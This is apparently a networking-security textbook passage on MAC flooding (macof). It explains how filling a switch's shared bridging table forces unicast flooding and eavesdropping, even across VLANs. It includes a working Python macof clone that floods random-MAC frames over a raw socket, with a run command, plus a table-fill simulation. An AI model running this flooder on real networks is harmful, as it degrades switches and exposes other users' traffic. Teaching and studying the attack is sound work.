Forcing an Excessive Flooding Condition

If a switch does not have an entry pointing to a destination MAC address, it floods the frame. What happens when a switch does not have room to store a new MAC address? And what happens if an entry that was there 2 seconds ago was just overwritten by another entry? These questions are probably what Ian Vitek asked himself back in 1999 when he wrote a little tool called macof (later ported to C by Dug Song). How a switch behaves when its bridging table is full depends on the vendor.

Most Cisco switches do not overwrite an existing entry in favor of a more recent one; however, once an existing entry ages out, a new one replaces it. Other switches behave like a circular buffer when the bridging table fills up: a new entry (MAC address Z, for example) simply overwrites an existing older entry (MAC address B, for example). Traffic destined to MAC address B now gets flooded out of every port that is a member of the sender's VLAN, except the port it arrived on. If a hacker constantly keeps the bridging table full, he effectively turns the switch into a hub, which makes it easy for anyone off any port to collect all traffic exchanged in that port's VLAN, including one-to-one unicast conversations, as Figures 2-4 and 2-5 show.

Figure 2-4 Existing Entries Are Overwritten

[Figure: a switch with a two-entry bridging table. Attached hosts are MAC B, MAC 0000.CAFE.0000, and host C running macof on port 3. The spoofed sources X and Y are both learned on port 3.]

    MAC Address   VLAN   Interface
    B             5      Fa0/2      (overwritten)
    X             5      Fa0/3
    Y             5      Fa0/3

Figure 2-4 shows a hypothetical LAN switch with room to store two MAC addresses in its bridging table. Although this switch surely fits into the "ridiculously under-engineered piece of equipment" category, it serves our illustration purposes well.

Host C starts running macof. The tool sends Ethernet frames to random destinations, each time modifying the source MAC address. When the first frame with source MAC address X arrives on port Fa0/3, it overwrites the 0000.CAFE.0000 entry. When the second frame arrives (source MAC Y), it overwrites the entry pointing to B. At this point, all communication between 0000.CAFE.0000 and B becomes public because of the flooding condition that macof created. Figure 2-5 illustrates this situation.
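What macof does on the wire, as an added example for this page (a minimal re-implementation in Python, not Dug Song's dsniff code): every frame is an Ethernet II / IPv4 / TCP SYN whose source and destination MACs, IP addresses and ports are all random, with valid IP and TCP checksums, so each frame is a fresh source-MAC learning event for the switch. Sending needs Linux (AF_PACKET) and CAP_NET_RAW; the interface name and the default frame count are assumptions.

```python
"""macof-style frame generator (added example, not Dug Song's dsniff macof).

Every frame is Ethernet II / IPv4 / TCP SYN with random source and destination
MACs, IPs and ports, so each one is a fresh source-MAC learning event for the
switch. Sending needs Linux (AF_PACKET) and CAP_NET_RAW; the interface name
and the frame count below are assumptions.
"""
import os
import random
import socket
import struct
import sys


def random_mac():
    """Random unicast (bit 0 of the first octet clear), locally administered (bit 1 set) MAC."""
    first = (random.randrange(256) & 0xFE) | 0x02
    return bytes([first]) + os.urandom(5)


def checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words, used by both IPv4 and TCP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_frame():
    """One 54-byte frame: 14 Ethernet + 20 IPv4 + 20 TCP, all addresses random."""
    src_mac, dst_mac = random_mac(), random_mac()
    src_ip, dst_ip = os.urandom(4), os.urandom(4)
    sport, dport = random.randrange(1024, 65536), random.randrange(1, 65536)
    # TCP: data offset 5 words, flags = SYN, window 8192, checksum filled in below
    tcp = struct.pack("!HHIIBBHHH", sport, dport, random.getrandbits(32), 0,
                      5 << 4, 0x02, 8192, 0, 0)
    pseudo = src_ip + dst_ip + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    # IPv4: version/IHL 0x45, TTL 64, protocol 6 (TCP), checksum filled in below
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), random.getrandbits(16),
                     0, 64, 6, 0, src_ip, dst_ip)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    eth = dst_mac + src_mac + struct.pack("!H", 0x0800)   # EtherType IPv4
    return eth + ip + tcp


def ip_checksum_ok(frame):
    """A correct IPv4 header checksum makes the whole header sum to zero."""
    return checksum(frame[14:34]) == 0


def tcp_checksum_ok(frame):
    """Recompute over the pseudo header plus the TCP segment (no IP options assumed)."""
    pseudo = frame[26:34] + struct.pack("!BBH", 0, 6, len(frame) - 34)
    return checksum(pseudo + frame[34:]) == 0


def flood(interface, count):
    """Blast `count` frames onto a Linux interface; every one carries a new source MAC."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((interface, 0))
        for _ in range(count):
            s.send(build_frame())


if __name__ == "__main__":
    iface = sys.argv[1] if len(sys.argv) > 1 else "eth0"   # assumed interface name
    flood(iface, int(sys.argv[2]) if len(sys.argv) > 2 else 10000)
```

Run as root on a Linux host attached to the switch under test, for example `python3 macof_clone.py eth0 100000`. Because every frame carries a previously unseen source MAC, a bridging table that advertises 32,000 entries is full after roughly that many frames, all of them learned on the attacker's port.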

Figure 2-5 Forced Flooding

[Figure: the same switch after macof has run from host C on port 3. The table holds only the spoofed sources; there is no entry for B, so traffic destined to B is flooded.]

    MAC Address   VLAN   Interface
    X             5      Fa0/3
    Y             5      Fa0/3
    (no entry for B -> traffic destined to B is flooded)

If a hacker keeps generating spurious frames from those source addresses (or any others), he creates a permanent table-full condition: legitimate entries are overwritten or, once aged out, can never be relearned, and the switch floods unicast traffic to every destination it no longer knows. This is where things get nasty. Switches typically don't build virtualized bridging tables. A given switch can store N thousand MAC addresses total. If a single port in a single VLAN learns N thousand addresses, flooding occurs for all VLANs! Traffic in VLAN 5 won't magically hop into VLAN 6, but all communication taking place in VLAN 6 will be visible to any eavesdropper connected to any port in VLAN 6.

What Is a Virtualized Bridging Table?

Because almost everything in engineering is a trade-off, manufacturers cannot build switches with extremely high bridging-table capacities while maintaining affordable prices. So, when a switch's bridging table claims it can store up to 32,000 entries, that figure is valid for the entire switch, not on a per-VLAN basis. Therefore, if a single malicious host inside a VLAN manages to completely fill up the table, innocent bystanders in other VLANs are affected: the switch cannot store their source MAC addresses, so unicast traffic destined to them is flooded within their VLAN.
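To make the two fill policies and the shared-table effect concrete, here is a small simulation added for this page (not the book's code and not any vendor's implementation). It replays the Figure 2-4 scenario, first with a circular-buffer table and then with a table that refuses to overwrite live entries until they age out, and then shows an attacker in VLAN 5 evicting the entries of hosts in VLAN 6. The port assignments, the MAC labels, the placement of 0000.CAFE.0000 on Fa0/1, and the 300-second aging timer are all assumptions.

```python
"""Toy model of a switch bridging (CAM) table under MAC flooding.

Added example for this page, not the book's or any vendor's code. It models a
hypothetical switch whose table holds `capacity` (VLAN, MAC) entries for the
whole switch, as the text describes, under the two fill policies discussed:
  "age-out"  - a full table never overwrites a live entry; a new source MAC
               is simply not learned until some entry ages out
  "circular" - a full table overwrites its oldest entry with the new one
Port names, MAC labels and the 300 s aging timer are assumptions.
"""
from collections import OrderedDict

AGING_SECONDS = 300  # assumed aging timer (Cisco IOS defaults to 300 s)


class BridgingTable:
    def __init__(self, capacity, policy, vlan_ports):
        self.capacity = capacity
        self.policy = policy
        self.vlan_ports = vlan_ports        # {vlan: set of member ports}
        self.entries = OrderedDict()        # (vlan, mac) -> (port, last_seen), oldest first
        self.not_learned = 0                # source MACs the switch had no room for

    def _age_out(self, now):
        for key in [k for k, (_, seen) in self.entries.items() if now - seen > AGING_SECONDS]:
            del self.entries[key]

    def learn(self, mac, vlan, port, now):
        """Source-MAC learning for one frame; returns True if the entry is in the table."""
        key = (vlan, mac)
        if key in self.entries:             # known source: refresh and mark most recent
            self.entries[key] = (port, now)
            self.entries.move_to_end(key)
            return True
        self._age_out(now)
        if len(self.entries) >= self.capacity:
            if self.policy == "age-out":
                self.not_learned += 1       # nothing to evict until something ages out
                return False
            self.entries.popitem(last=False)  # circular buffer: evict the oldest entry
        self.entries[key] = (port, now)
        return True

    def forward(self, dst_mac, vlan, ingress, now):
        """Egress ports for a unicast frame: one port if known, else flood the VLAN."""
        self._age_out(now)
        hit = self.entries.get((vlan, dst_mac))
        if hit:
            return {hit[0]}
        return self.vlan_ports[vlan] - {ingress}


def figure_2_4(policy):
    """Two-entry switch of Figure 2-4: 0000.CAFE.0000 and B are learned, then macof
    on Fa0/3 sends frames from X and Y. Returns the egress set for a frame to B
    and the table itself."""
    sw = BridgingTable(2, policy, {5: {"Fa0/1", "Fa0/2", "Fa0/3"}})
    sw.learn("0000.cafe.0000", 5, "Fa0/1", now=0)   # CAFE's port is not in the figure; Fa0/1 assumed
    sw.learn("mac-b", 5, "Fa0/2", now=0)
    sw.learn("mac-x", 5, "Fa0/3", now=1)            # first spoofed source
    sw.learn("mac-y", 5, "Fa0/3", now=1)            # second spoofed source
    return sw.forward("mac-b", 5, ingress="Fa0/1", now=2), sw


def cross_vlan_impact(policy="circular"):
    """Four-entry switch with VLAN 5 on Fa0/1-3 and VLAN 6 on Fa0/4-6. Two hosts in
    VLAN 6 are learned, then an attacker in VLAN 5 fills the shared table."""
    sw = BridgingTable(4, policy, {5: {"Fa0/1", "Fa0/2", "Fa0/3"},
                                   6: {"Fa0/4", "Fa0/5", "Fa0/6"}})
    sw.learn("mac-m", 6, "Fa0/4", now=0)
    sw.learn("mac-n", 6, "Fa0/5", now=0)
    for i in range(4):                              # four spoofed sources from one VLAN 5 port
        sw.learn(f"02:00:00:00:00:{i:02x}", 5, "Fa0/3", now=1)
    return {
        "vlan6_to_n": sw.forward("mac-n", 6, ingress="Fa0/4", now=2),  # flooded inside VLAN 6
        "vlan5_to_n": sw.forward("mac-n", 5, ingress="Fa0/1", now=2),  # never leaves VLAN 5
    }


if __name__ == "__main__":
    for policy in ("circular", "age-out"):
        ports, sw = figure_2_4(policy)
        print(f"{policy:8s}: frame to B goes out {sorted(ports)}, table={list(sw.entries)}")
    print("shared table, attacker in VLAN 5:", cross_vlan_impact())
```

Under the circular policy the two macof frames evict both legitimate entries, and a frame to B goes out Fa0/2 and Fa0/3. Under the age-out policy the spoofed sources are refused at first, but once the real entries age out (300 s in the model) the attacker takes the freed slots and the outcome is the same. In the shared-table scenario a frame addressed in VLAN 5 never egresses a VLAN 6 port, yet unicast to the VLAN 6 hosts is flooded to every VLAN 6 port, including the one an eavesdropper sits on.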
